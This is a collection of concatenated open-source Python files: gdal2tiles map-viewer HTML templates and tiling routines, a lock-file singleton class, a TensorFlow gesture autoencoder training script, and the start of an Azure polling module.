GMapType.prototype.getCopyrights = function(bounds,zoom) {
return ["%(copyright)s"].concat(gcr.call(this,bounds,zoom));
}
map = new GMap2( document.getElementById("map"), { backgroundColor: '#fff' } );
map.addMapType(G_PHYSICAL_MAP);
map.setMapType(G_PHYSICAL_MAP);
map.setCenter( mapBounds.getCenter(), map.getBoundsZoomLevel( mapBounds ));
hybridOverlay = new GTileLayerOverlay( G_HYBRID_MAP.getTileLayers()[1] );
GEvent.addListener(map, "maptypechanged", function() {
if (map.getCurrentMapType() == G_HYBRID_MAP) {
map.addOverlay(hybridOverlay);
} else {
map.removeOverlay(hybridOverlay);
}
} );
var tilelayer = new GTileLayer(GCopyrightCollection(''), mapMinZoom, mapMaxZoom);
var mercator = new GMercatorProjection(mapMaxZoom+1);
tilelayer.getTileUrl = function(tile,zoom) {
if ((zoom < mapMinZoom) || (zoom > mapMaxZoom)) {
return "http://www.maptiler.org/img/none.png";
}
var ymax = 1 << zoom;
var y = ymax - tile.y -1;
var tileBounds = new GLatLngBounds(
mercator.fromPixelToLatLng( new GPoint( (tile.x)*256, (tile.y+1)*256 ) , zoom ),
mercator.fromPixelToLatLng( new GPoint( (tile.x+1)*256, (tile.y)*256 ) , zoom )
);
if (mapBounds.intersects(tileBounds)) {
return zoom+"/"+tile.x+"/"+y+".png";
} else {
return "http://www.maptiler.org/img/none.png";
}
}
// IE 7-: support for PNG alpha channel
// Unfortunately, the opacity of the whole overlay is then not changeable.
tilelayer.isPng = function() { return true;};
tilelayer.getOpacity = function() { return opacity; }
overlay = new GTileLayerOverlay( tilelayer );
map.addOverlay(overlay);
map.addControl(new GLargeMapControl());
map.addControl(new GHierarchicalMapTypeControl());
map.addControl(new CTransparencyControl( overlay ));
""" % args # noqa
if self.kml:
s += """
map.addMapType(G_SATELLITE_3D_MAP);
map.getEarthInstance(getEarthInstanceCB);
"""
s += """
map.enableContinuousZoom();
map.enableScrollWheelZoom();
map.setMapType(G_HYBRID_MAP);
}
resize();
}
"""
if self.kml:
s += """
function getEarthInstanceCB(object) {
var ge = object;
if (ge) {
var url = document.location.toString();
url = url.substr(0,url.lastIndexOf('/'))+'/doc.kml';
var link = ge.createLink("");
if ("%(publishurl)s") { link.setHref("%(publishurl)s/doc.kml") }
else { link.setHref(url) };
var networkLink = ge.createNetworkLink("");
networkLink.setName("TMS Map Overlay");
networkLink.setFlyToView(true);
networkLink.setLink(link);
ge.getFeatures().appendChild(networkLink);
} else {
// alert("You should open a KML in Google Earth");
// add div with the link to generated KML... - maybe JavaScript redirect to the URL of KML?
}
}
""" % args # noqa
s += """
onresize=function(){ resize(); };
//]]>
</script>
</head>
<body onload="load()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LEAVE THIS NOTE ABOUT THE AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE HTML COMMENT. THANK YOU -->
</div>
<div id="map"></div>
</body>
</html>
""" % args # noqa
return s
def generate_leaflet(self):
"""
Template for leaflet.html implementing overlay of tiles for 'mercator' profile.
It returns filled string. Expected variables:
title, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title.replace('"', '\\"')
args['htmltitle'] = self.options.title
args['south'], args['west'], args['north'], args['east'] = self.swne
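# Note: 'centerlon' actually holds the latitude midpoint and 'centerlat' the longitude
# midpoint; the names are swapped but used consistently as [lat, lon] in the Leaflet
# template below.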
args['centerlon'] = (args['north'] + args['south']) / 2.
args['centerlat'] = (args['west'] + args['east']) / 2.
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['beginzoom'] = self.tmaxz
args['tile_size'] = self.tile_size # not used
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url # not used
args['copyright'] = self.options.copyright.replace('"', '\\"')
s = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name='viewport' content='width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no' />
<title>%(htmltitle)s</title>
<!-- Leaflet -->
<link rel="stylesheet" href="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.css" />
<script src="http://cdn.leafletjs.com/leaflet-0.7.5/leaflet.js"></script>
<style>
body { margin:0; padding:0; }
body, table, tr, td, th, div, h1, h2, input { font-family: "Calibri", "Trebuchet MS", "Ubuntu", Serif; font-size: 11pt; }
#map { position:absolute; top:0; bottom:0; width:100%%; } /* full size */
.ctl {
padding: 2px 10px 2px 10px;
background: white;
background: rgba(255,255,255,0.9);
box-shadow: 0 0 15px rgba(0,0,0,0.2);
border-radius: 5px;
text-align: right;
}
.title {
font-size: 18pt;
font-weight: bold;
}
.src {
font-size: 10pt;
}
</style>
</head>
<body>
<div id="map"></div>
<script>
/* **** Leaflet **** */
// Base layers
// .. OpenStreetMap
var osm = L.tileLayer('http://{s}.tile.osm.org/{z}/{x}/{y}.png', {attribution: '© <a href="http://osm.org/copyright">OpenStreetMap</a> contributors'});
// .. CartoDB Positron
var cartodb = L.tileLayer('http://{s}.basemaps.cartocdn.com/light_all/{z}/{x}/{y}.png', {attribution: '© <a href="http://www.openstreetmap.org/copyright">OpenStreetMap</a> contributors, © <a href="http://cartodb.com/attributions">CartoDB</a>'});
// .. OSM Toner
var toner = L.tileLayer('http://{s}.tile.stamen.com/toner/{z}/{x}/{y}.png', {attribution: 'Map tiles by <a href="http://stamen.com">Stamen Design</a>, under <a href="http://creativecommons.org/licenses/by/3.0">CC BY 3.0</a>. Data by <a href="http://openstreetmap.org">OpenStreetMap</a>, under <a href="http://www.openstreetmap.org/copyright">ODbL</a>.'});
// .. White background
var white = L.tileLayer("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAQAAAAEAAQMAAABmvDolAAAAA1BMVEX///+nxBvIAAAAH0lEQVQYGe3BAQ0AAADCIPunfg43YAAAAAAAAAAA5wIhAAAB9aK9BAAAAABJRU5ErkJggg==");
// Overlay layers (TMS)
var lyr = L.tileLayer('./{z}/{x}/{y}.%(tileformat)s', {tms: true, opacity: 0.7, attribution: "%(copyright)s"});
// Map
var map = L.map('map', {
center: [%(centerlon)s, %(centerlat)s],
zoom: %(beginzoom)s,
minZoom: %(minzoom)s,
maxZoom: %(maxzoom)s,
layers: [osm]
});
var basemaps = {"OpenStreetMap": osm, "CartoDB Positron": cartodb, "Stamen Toner": toner, "Without background": white}
var overlaymaps = {"Layer": lyr}
// Title
var title = L.control();
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl title');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = "%(title)s";
};
title.addTo(map);
// Note
var src = 'Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>';
var title = L.control({position: 'bottomleft'});
title.onAdd = function(map) {
this._div = L.DomUtil.create('div', 'ctl src');
this.update();
return this._div;
};
title.update = function(props) {
this._div.innerHTML = src;
};
title.addTo(map);
// Add base layers
L.control.layers(basemaps, overlaymaps, {collapsed: false}).addTo(map);
// Fit to overlay bounds (SW and NE points with (lat, lon))
map.fitBounds([[%(south)s, %(east)s], [%(north)s, %(west)s]]);
</script>
</body>
</html>
""" % args # noqa
return s
def generate_openlayers(self):
"""
Template for openlayers.html implementing an overlay of the available Spherical Mercator layers.
Returns the filled string. Expected variables:
title, bingkey, north, south, east, west, minzoom, maxzoom, tile_size, tileformat, publishurl
"""
args = {}
args['title'] = self.options.title
args['bingkey'] = self.options.bingkey
args['south'], args['west'], args['north'], args['east'] = self.swne
args['minzoom'] = self.tminz
args['maxzoom'] = self.tmaxz
args['tile_size'] = self.tile_size
args['tileformat'] = self.tileext
args['publishurl'] = self.options.url
args['copyright'] = self.options.copyright
if self.options.tmscompatible:
args['tmsoffset'] = "-1"
else:
args['tmsoffset'] = ""
if self.options.profile == 'raster':
args['rasterzoomlevels'] = self.tmaxz + 1
args['rastermaxresolution'] = 2**(self.nativezoom) * self.out_gt[1]
s = r"""<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>%(title)s</title>
<meta http-equiv='imagetoolbar' content='no'/>
<style type="text/css"> v\:* {behavior:url(#default#VML);}
html, body { overflow: hidden; padding: 0; height: 100%%; width: 100%%; font-family: 'Lucida Grande',Geneva,Arial,Verdana,sans-serif; }
body { margin: 10px; background: #fff; }
h1 { margin: 0; padding: 6px; border:0; font-size: 20pt; }
#header { height: 43px; padding: 0; background-color: #eee; border: 1px solid #888; }
#subheader { height: 12px; text-align: right; font-size: 10px; color: #555;}
#map { height: 95%%; border: 1px solid #888; }
.olImageLoadError { display: none; }
.olControlLayerSwitcher .layersDiv { border-radius: 10px 0 0 10px; }
</style>""" % args # noqa
if self.options.profile == 'mercator':
s += """
<script src='http://maps.google.com/maps/api/js?sensor=false&v=3.7'></script>
""" % args
s += """
<script src="http://www.openlayers.org/api/2.12/OpenLayers.js"></script>
<script>
var map;
var mapBounds = new OpenLayers.Bounds( %(west)s, %(south)s, %(east)s, %(north)s);
var mapMinZoom = %(minzoom)s;
var mapMaxZoom = %(maxzoom)s;
var emptyTileURL = "http://www.maptiler.org/img/none.png";
OpenLayers.IMAGE_RELOAD_ATTEMPTS = 3;
function init(){""" % args
if self.options.profile == 'mercator':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:3857",
displayProjection: new OpenLayers.Projection("EPSG:4326"),
numZoomLevels: 20
};
map = new OpenLayers.Map(options);
// Create Google Mercator layers
var gmap = new OpenLayers.Layer.Google("Google Streets",
{
type: google.maps.MapTypeId.ROADMAP,
sphericalMercator: true
});
var gsat = new OpenLayers.Layer.Google("Google Satellite",
{
type: google.maps.MapTypeId.SATELLITE,
sphericalMercator: true
});
var ghyb = new OpenLayers.Layer.Google("Google Hybrid",
{
type: google.maps.MapTypeId.HYBRID,
sphericalMercator: true
});
var gter = new OpenLayers.Layer.Google("Google Terrain",
{
type: google.maps.MapTypeId.TERRAIN,
sphericalMercator: true
});
// Create Bing layers
var broad = new OpenLayers.Layer.Bing({
name: "Bing Roads",
key: "%(bingkey)s",
type: "Road",
sphericalMercator: true
});
var baer = new OpenLayers.Layer.Bing({
name: "Bing Aerial",
key: "%(bingkey)s",
type: "Aerial",
sphericalMercator: true
});
var bhyb = new OpenLayers.Layer.Bing({
name: "Bing Hybrid",
key: "%(bingkey)s",
type: "AerialWithLabels",
sphericalMercator: true
});
// Create OSM layer
var osm = new OpenLayers.Layer.OSM("OpenStreetMap");
// create TMS Overlay layer
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([gmap, gsat, ghyb, gter,
broad, baer, bhyb,
osm, tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds.transform(map.displayProjection, map.projection));
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
var options = {
div: "map",
controls: [],
projection: "EPSG:4326"
};
map = new OpenLayers.Map(options);
var wms = new OpenLayers.Layer.WMS("VMap0",
"http://tilecache.osgeo.org/wms-c/Basic.py?",
{
layers: 'basic',
format: 'image/png'
}
);
var tmsoverlay = new OpenLayers.Layer.TMS("TMS Overlay", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
isBaseLayer: false,
getURL: getURL
});
if (OpenLayers.Util.alphaHack() == false) {
tmsoverlay.setOpacity(0.7);
}
map.addLayers([wms,tmsoverlay]);
var switcherControl = new OpenLayers.Control.LayerSwitcher();
map.addControl(switcherControl);
switcherControl.maximizeControl();
map.zoomToExtent(mapBounds);
""" % args # noqa
elif self.options.profile == 'raster':
s += """
var options = {
div: "map",
controls: [],
maxExtent: new OpenLayers.Bounds(%(west)s, %(south)s, %(east)s, %(north)s),
maxResolution: %(rastermaxresolution)f,
numZoomLevels: %(rasterzoomlevels)d
};
map = new OpenLayers.Map(options);
var layer = new OpenLayers.Layer.TMS("TMS Layer", "",
{
serviceVersion: '.',
layername: '.',
alpha: true,
type: '%(tileformat)s',
getURL: getURL
});
map.addLayer(layer);
map.zoomToExtent(mapBounds);
""" % args # noqa
s += """
map.addControls([new OpenLayers.Control.PanZoomBar(),
new OpenLayers.Control.Navigation(),
new OpenLayers.Control.MousePosition(),
new OpenLayers.Control.ArgParser(),
new OpenLayers.Control.Attribution()]);
}
""" % args
if self.options.profile == 'mercator':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tile_size.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tile_size.h));
var z = this.getServerZoom();
if (this.map.baseLayer.CLASS_NAME === 'OpenLayers.Layer.Bing') {
z+=1;
}
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'geodetic':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tile_size.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tile_size.h));
var z = this.getServerZoom()%(tmsoffset)s;
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
elif self.options.profile == 'raster':
s += """
function getURL(bounds) {
bounds = this.adjustBounds(bounds);
var res = this.getServerResolution();
var x = Math.round((bounds.left - this.tileOrigin.lon) / (res * this.tile_size.w));
var y = Math.round((bounds.bottom - this.tileOrigin.lat) / (res * this.tile_size.h));
var z = this.getServerZoom();
var path = this.serviceVersion + "/" + this.layername + "/" + z + "/" + x + "/" + y + "." + this.type;
var url = this.url;
if (OpenLayers.Util.isArray(url)) {
url = this.selectUrl(path, url);
}
if (mapBounds.intersectsBounds(bounds) && (z >= mapMinZoom) && (z <= mapMaxZoom)) {
return url + path;
} else {
return emptyTileURL;
}
}
""" % args # noqa
s += """
function getWindowHeight() {
if (self.innerHeight) return self.innerHeight;
if (document.documentElement && document.documentElement.clientHeight)
return document.documentElement.clientHeight;
if (document.body) return document.body.clientHeight;
return 0;
}
function getWindowWidth() {
if (self.innerWidth) return self.innerWidth;
if (document.documentElement && document.documentElement.clientWidth)
return document.documentElement.clientWidth;
if (document.body) return document.body.clientWidth;
return 0;
}
function resize() {
var map = document.getElementById("map");
var header = document.getElementById("header");
var subheader = document.getElementById("subheader");
map.style.height = (getWindowHeight()-80) + "px";
map.style.width = (getWindowWidth()-20) + "px";
header.style.width = (getWindowWidth()-20) + "px";
subheader.style.width = (getWindowWidth()-20) + "px";
if (map.updateSize) { map.updateSize(); };
}
onresize=function(){ resize(); };
</script>
</head>
<body onload="init()">
<div id="header"><h1>%(title)s</h1></div>
<div id="subheader">Generated by <a href="http://www.klokan.cz/projects/gdal2tiles/">GDAL2Tiles</a>, Copyright © 2008 <a href="http://www.klokan.cz/">Klokan Petr Pridal</a>, <a href="http://www.gdal.org/">GDAL</a> & <a href="http://www.osgeo.org/">OSGeo</a> <a href="http://code.google.com/soc/">GSoC</a>
<!-- PLEASE, LET THIS NOTE ABOUT AUTHOR AND PROJECT SOMEWHERE ON YOUR WEBSITE, OR AT LEAST IN THE COMMENT IN HTML. THANK YOU -->
</div>
<div id="map"></div>
<script type="text/javascript" >resize()</script>
</body>
</html>""" % args # noqa
return s
def worker_tile_details(input_file, output_folder, options, send_pipe=None):
try:
gdal2tiles = GDAL2Tiles(input_file, output_folder, options)
gdal2tiles.open_input()
gdal2tiles.generate_metadata()
tile_job_info, tile_details = gdal2tiles.generate_base_tiles()
return_data = (tile_job_info, tile_details)
if send_pipe:
send_pipe.send(return_data)
return return_data
except Exception as e:
print("worker_tile_details failed ", str(e))
raise
def progress_printer_thread(queue, nb_jobs):
pb = ProgressBar(nb_jobs)
pb.start()
for _ in range(nb_jobs):
queue.get()
pb.log_progress()
queue.task_done()
class ProgressBar(object):
def __init__(self, total_items):
self.total_items = total_items
self.nb_items_done = 0
self.current_progress = 0
self.STEP = 2.5
def start(self):
sys.stdout.write("0")
def log_progress(self, nb_items=1):
self.nb_items_done += nb_items
progress = float(self.nb_items_done) / self.total_items * 100
if progress >= self.current_progress + self.STEP:
done = False
while not done:
if self.current_progress + self.STEP <= progress:
self.current_progress += self.STEP
if self.current_progress % 10 == 0:
sys.stdout.write(str(int(self.current_progress)))
if self.current_progress == 100:
sys.stdout.write("\n")
else:
sys.stdout.write(".")
else:
done = True
sys.stdout.flush()
def get_tile_swne(tile_job_info, options):
if options.profile == 'mercator':
mercator = GlobalMercator()
tile_swne = mercator.TileLatLonBounds
elif options.profile == 'geodetic':
geodetic = GlobalGeodetic(options.tmscompatible)
tile_swne = geodetic.TileLatLonBounds
elif options.profile == 'raster':
srs4326 = osr.SpatialReference()
srs4326.ImportFromEPSG(4326)
if tile_job_info.kml and tile_job_info.in_srs_wkt:
in_srs = osr.SpatialReference()
in_srs.ImportFromWkt(tile_job_info.in_srs_wkt)
ct = osr.CoordinateTransformation(in_srs, srs4326)
def rastertileswne(x, y, z):
pixelsizex = (2 ** (tile_job_info.tmaxz - z) * tile_job_info.out_geo_trans[1])
west = tile_job_info.out_geo_trans[0] + x * tile_job_info.tile_size * pixelsizex
east = west + tile_job_info.tile_size * pixelsizex
south = tile_job_info.ominy + y * tile_job_info.tile_size * pixelsizex
north = south + tile_job_info.tile_size * pixelsizex
if not tile_job_info.is_epsg_4326:
# Transformation to EPSG:4326 (WGS84 datum)
west, south = ct.TransformPoint(west, south)[:2]
east, north = ct.TransformPoint(east, north)[:2]
return south, west, north, east
tile_swne = rastertileswne
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
else:
tile_swne = lambda x, y, z: (0, 0, 0, 0) # noqa
return tile_swne
def single_threaded_tiling(input_file, output_folder, options):
"""
Keep a single-threaded version that stays clear of multiprocessing, for platforms that do not
support it.
"""
if options.verbose:
print("Begin tiles details calc")
conf, tile_details = worker_tile_details(input_file, output_folder, options)
if options.verbose:
print("Tiles details calc complete.")
if not options.verbose and not options.quiet:
progress_bar = ProgressBar(len(tile_details))
progress_bar.start()
for tile_detail in tile_details:
create_base_tile(conf, tile_detail)
if not options.verbose and not options.quiet:
progress_bar.log_progress()
if getattr(threadLocal, 'cached_ds', None):
del threadLocal.cached_ds
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def multi_threaded_tiling(input_file, output_folder, options):
nb_processes = options.nb_processes or 1
# Make sure that all processes do not consume more than GDAL_CACHEMAX
os.environ['GDAL_CACHEMAX'] = '%d' % int(gdal.GetCacheMax() / nb_processes)
(conf_receiver, conf_sender) = Pipe(False)
if options.verbose:
print("Begin tiles details calc")
p = Process(target=worker_tile_details,
args=[input_file, output_folder, options],
kwargs={"send_pipe": conf_sender})
p.start()
# Make sure to consume the pipe before joining. If the payload is too big, it won't be sent in
# one go, and the sending process would never finish, waiting for space in the pipe to send the
# rest of its data
conf, tile_details = conf_receiver.recv()
p.join()
if options.verbose:
print("Tiles details calc complete.")
# Have to create the Queue through a multiprocessing.Manager to get a Queue Proxy,
# otherwise you can't pass it as a param in the method invoked by the pool...
manager = Manager()
queue = manager.Queue()
pool = Pool(processes=nb_processes)
# TODO: gbataille - check the confs for which each element is an array... one useless level?
# TODO: gbataille - assign an ID to each job for print in verbose mode "ReadRaster Extent ..."
for tile_detail in tile_details:
pool.apply_async(create_base_tile, (conf, tile_detail), {"queue": queue})
if not options.verbose and not options.quiet:
p = Process(target=progress_printer_thread, args=[queue, len(tile_details)])
p.start()
pool.close()
pool.join() # Jobs finished
if not options.verbose and not options.quiet:
p.join() # Traces done
create_overview_tiles(conf, output_folder, options)
shutil.rmtree(os.path.dirname(conf.src_file))
def main():
# TODO: gbataille - use mkdtemp to work in a temp directory
# TODO: gbataille - debug intermediate tiles.vrt not produced anymore?
# TODO: gbataille - Refactor generate overview tiles to not depend on self variables
argv = gdal.GeneralCmdLineProcessor(sys.argv)
input_file, output_folder, options = process_args(argv[1:])
nb_processes = options.nb_processes or 1
if nb_processes == 1:
single_threaded_tiling(input_file, output_folder, options)
else:
multi_threaded_tiling(input_file, output_folder, options)
if __name__ == '__main__':
main()
# vim: set tabstop=4 shiftwidth=4 expandtab:
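# --- Illustrative usage sketch (not part of the upstream gdal2tiles module) ---
# The comments in multi_threaded_tiling() above explain why the tile details are computed in a
# child process and streamed back over a Pipe before a Pool renders the base tiles. The sketch
# below shows how the two entry points might be driven programmatically, mirroring what main()
# does with sys.argv. The raster path, output folder, and the "--zoom"/"--processes" flags are
# assumptions for illustration; process_args() is assumed to accept the same argument list that
# main() forwards to it.
def _example_run_tiling(src_raster="input.tif", dst_folder="tiles", processes=1):
    """Hypothetical helper showing the single- vs multi-threaded dispatch used by main()."""
    argv = [src_raster, dst_folder, "--zoom=2-5", "--processes=%d" % processes]
    input_file, output_folder, options = process_args(argv)
    if (options.nb_processes or 1) == 1:
        single_threaded_tiling(input_file, output_folder, options)
    else:
        multi_threaded_tiling(input_file, output_folder, options)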
|
singleton.py
|
"""
Taken from https://github.com/pycontribs/tendo/blob/master/tendo/singleton.py on 01/01/2021 and modified to remove error message
"""
from multiprocessing import Process
import os
import sys
import tempfile
if sys.platform != "win32":
import fcntl
class SingleInstanceException(BaseException):
pass
class SingleInstance(object):
"""Class that can be instantiated only once per machine.
If you want to prevent your script from running in parallel, just instantiate the SingleInstance() class. If another instance is already running, it will raise a `SingleInstanceException`.
This is very useful for scripts executed by crontab at short intervals.
Remember that this works by creating a lock file with a filename based on the full path to the script file.
Providing a flavor_id will augment the filename with the provided flavor_id, allowing you to create multiple singleton instances from the same file. This is particularly useful if you want specific functions to have their own singleton instances.
"""
def __init__(self, flavor_id="", lockfile=""):
self.initialized = False
if lockfile:
self.lockfile = lockfile
else:
basename = os.path.splitext(os.path.abspath(sys.argv[0]))[0].replace(
"/", "-").replace(":", "").replace("\\", "-") + '-%s' % flavor_id + '.lock'
self.lockfile = os.path.normpath(
tempfile.gettempdir() + '/' + basename)
# logger.debug("SingleInstance lockfile: " + self.lockfile)
if sys.platform == 'win32':
try:
# file already exists, we try to remove (in case previous
# execution was interrupted)
if os.path.exists(self.lockfile):
os.unlink(self.lockfile)
self.fd = os.open(
self.lockfile, os.O_CREAT | os.O_EXCL | os.O_RDWR)
except OSError:
exc_type, e, tb = sys.exc_info()  # avoid shadowing the built-in 'type'
if e.errno == 13:
# logger.error(
# "Another instance is already running, quitting.")
raise SingleInstanceException()
print(e.errno)
raise
else: # non Windows
self.fp = open(self.lockfile, 'w')
self.fp.flush()
try:
fcntl.lockf(self.fp, fcntl.LOCK_EX | fcntl.LOCK_NB)
except IOError:
# logger.warning(
# "Another instance is already running, quitting.")
raise SingleInstanceException()
self.initialized = True
def __del__(self):
if not self.initialized:
return
try:
if sys.platform == 'win32':
if hasattr(self, 'fd'):
os.close(self.fd)
os.unlink(self.lockfile)
else:
fcntl.lockf(self.fp, fcntl.LOCK_UN)
# os.close(self.fp)
if os.path.isfile(self.lockfile):
os.unlink(self.lockfile)
except Exception as e:
# the module-level logger was removed in this trimmed copy, so fall back to printing
print("Unloggable error: %s" % e)
sys.exit(-1)
def f(name):
# tmp = logger.level
# logger.setLevel(logging.CRITICAL) # we do not want to see the warning
try:
me2 = SingleInstance(flavor_id=name) # noqa
except SingleInstanceException:
sys.exit(-1)
# logger.setLevel(tmp)
pass
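# --- Illustrative usage sketch (not part of the upstream tendo module) ---
# The SingleInstance docstring above describes the intended pattern: create one instance near the
# top of a script and treat SingleInstanceException as "another copy is already running". The
# flavor_id value below is an arbitrary example; any string that distinguishes the lock file works.
def _example_guarded_entry_point():
    try:
        # keep a reference for the lifetime of the script: the lock is only released in __del__
        guard = SingleInstance(flavor_id="nightly-report")
    except SingleInstanceException:
        sys.exit("another instance is already running")
    # ... the script's real work would run here, while 'guard' stays alive ...
    return guard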
# class testSingleton(unittest.TestCase):
#
# def test_1(self):
# me = SingleInstance(flavor_id="test-1")
# del me # now the lock should be removed
# assert True
#
# def test_2(self):
# p = Process(target=f, args=("test-2",))
# p.start()
# p.join()
# # the called function should succeed
# assert p.exitcode == 0, "%s != 0" % p.exitcode
#
# def test_3(self):
# me = SingleInstance(flavor_id="test-3") # noqa -- me should still kept
# p = Process(target=f, args=("test-3",))
# p.start()
# p.join()
# # the called function should fail because we already have another
# # instance running
# assert p.exitcode != 0, "%s != 0 (2nd execution)" % p.exitcode
# # note, we return -1 but this translates to 255 meanwhile we'll
# # consider that anything different from 0 is good
# p = Process(target=f, args=("test-3",))
# p.start()
# p.join()
# # the called function should fail because we already have another
# # instance running
# assert p.exitcode != 0, "%s != 0 (3rd execution)" % p.exitcode
#
# def test_4(self):
# lockfile = '/tmp/foo.lock'
# me = SingleInstance(lockfile=lockfile)
# assert me.lockfile == lockfile
#
#
# logger = logging.getLogger("tendo.singleton")
# if __name__ == "__main__":
# logger.addHandler(logging.StreamHandler())
# logger.setLevel(logging.DEBUG)
# unittest.main()
|
main_autoencoder.py
|
import os
import queue
import threading
from time import sleep
import numpy as np
import tensorflow as tf
from tensorflow.python.training.adam import AdamOptimizer
from env import MultiArmTorqueEnvironment
from models import autoencoder_seq
N_ITERATIONS = 10000
N_JOINTS = 2
SEQ_LEN = 16
BATCH_SIZE = 1024 * 16
MOTION_SELECTION = 4 * 4
LSTM_SIZE = MOTION_SELECTION + 2 ** N_JOINTS
MOTIONS = np.identity(MOTION_SELECTION)
# BATCH_SIZE, MOTION_SELECTION
selected_gesture = tf.placeholder(tf.float32, [None, MOTION_SELECTION], 'selected_gesture')
batch_sz = tf.shape(selected_gesture)[0]
noise_op = tf.random_uniform([batch_sz, SEQ_LEN], -1, 1, tf.float32, None, 'noise_sequence')
with tf.variable_scope('noisy_initial_state'):
x = lambda: tf.random_uniform([batch_sz, LSTM_SIZE], -1, 1, tf.float32)
initial_state_op = [[x(), x()], [x(), x()]]
with tf.variable_scope('autoencoder'):
# [BATCH_SIZE, MOTION_SELECTION] , [BATCH_SIZE, SEQ_LEN, N_JOINTS]
softmax_class_op, pred_states_op, _ = autoencoder_seq(selected_gesture, noise_op, initial_state_op, SEQ_LEN,
N_JOINTS,
LSTM_SIZE)
with tf.variable_scope('eval'):
pred_class, true_class = tf.argmax(softmax_class_op, axis=1), tf.argmax(selected_gesture, axis=1)
accuracy = tf.divide(tf.count_nonzero(tf.equal(pred_class, true_class), dtype=tf.int32), batch_sz, name='accuracy')
tf.summary.scalar('accuracy', accuracy)
from tflearn.objectives import categorical_crossentropy
loss = categorical_crossentropy(softmax_class_op, selected_gesture)
tf.summary.scalar('classification_loss', loss)
with tf.variable_scope('optimize'):
lr_op = tf.Variable(5e-4, False, dtype=tf.float32)
decay_lr_op = tf.assign(lr_op, lr_op * (1 - 1e-4))
tf.summary.scalar('learning_rate', lr_op)
with tf.control_dependencies([decay_lr_op]):
train_step = AdamOptimizer(learning_rate=lr_op).minimize(loss)
display_q = queue.Queue(10)
def display():
while True:
softmax_class, display_states = display_q.get()
print("Prediction: ", np.max(softmax_class, axis=1))
for states in np.transpose(display_states, axes=[1, 0, 2]):
env.step(states)
env.render()
sleep(.2 / (display_q.qsize() + 1))
env.reset()
threading.Thread(target=display).start()
summaries_op = tf.summary.merge_all()
writer = tf.summary.FileWriter(os.environ['logdir'] + '/creative_autoencoder/', tf.get_default_graph())
env = MultiArmTorqueEnvironment(n_arms=MOTION_SELECTION, n_joints=N_JOINTS, time_lim=SEQ_LEN)
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
with tf.Session(config=config) as sess:
sess.run(tf.global_variables_initializer())
for iteration in range(N_ITERATIONS):
batch = MOTIONS[np.random.randint(0, MOTION_SELECTION, BATCH_SIZE)]
_, summaries, _ = sess.run([train_step, summaries_op, decay_lr_op], feed_dict={selected_gesture: batch})
writer.add_summary(summaries, iteration)  # tag summaries with the training step so TensorBoard plots them over time
if iteration % 40 == 0:
display_q.put(sess.run([softmax_class_op, pred_states_op], feed_dict={selected_gesture: MOTIONS}))
writer.flush()
env.reset()
|
_polling.py
|
# ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
